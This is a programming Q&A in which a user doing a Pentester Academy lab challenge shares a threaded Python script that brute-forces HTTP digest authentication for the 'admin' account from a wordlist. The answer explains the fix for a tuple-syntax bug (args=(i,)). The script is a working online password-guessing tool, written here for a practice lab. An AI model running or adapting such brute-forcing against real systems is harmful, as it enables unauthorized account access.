# Trying to thread in python 3

Tags: python-3.x, python-multithreading

I have been working on a pentester academy challenge to brute force digest auth which is now working but I now want to thread it so it goes quicker. this, however, is not working and produces the error below.

**ERROR MESSAGE**

```
    self.__target(*self.__args, **self.__kwargs)
    TypeError: attempt_user() takes exactly 1 argument (5 given)
```

I can't figure out why its taking 5 arguments when I'm only giving one, any help is appreciated. my code is below.

**CODE**

```
import hashlib
import requests
import re
from threading import *
from requests.auth import HTTPDigestAuth

URL =  'http://pentesteracademylab.appspot.com/lab/webapp/digest/1'


lines = [line.rstrip('\n') for line in open('wordl2.txt')]




def attempt_user(i):
try:
    r = requests.get(URL, auth=HTTPDigestAuth('admin', i))
    test = r.status_code
    print ('status code for {} is {}'.format(i, test))
    print (r.headers)
except:
    print ('fail')

# Loop ports informed by parameter
for i in lines:
    # Create a thread by calling the connect function and passing the host and port as a parameter
    t = Thread(target=attempt_user, args=(i))
    # start a thread
    t.start()
```

Comment: Try `t = Thread(target=attempt_user, args=(i,))` (note the comma)

Comment: not sure why that worked but it did so thank you very much.

Comment: if you wanna add it as a reply post I will tick it

Answer (score 1, accepted):

The reason this didn't work is that `args` should be an iterable containing the arguments. What you gave it was not (as you may have thought) a tuple, but a single value (in your case a string (!)).

This is not a tuple:

```
("foo")
```

This is a tuple:

```
("foo",)
```

So when you do `t = Thread(target=attempt_user, args=(i))`, `Thread.__init__` takes every element in `i` (in this case, the five characters) and hands them as individual parameters to `attempt_user`.

The fix, as stated in my comment, is to actually hand over a tuple:

```
# Loop ports informed by parameter
for i in lines:
    # Create a thread by calling the connect function and passing the host and port as a parameter
    t = Thread(target=attempt_user, args=(i,))
    # start a thread
    t.start()
```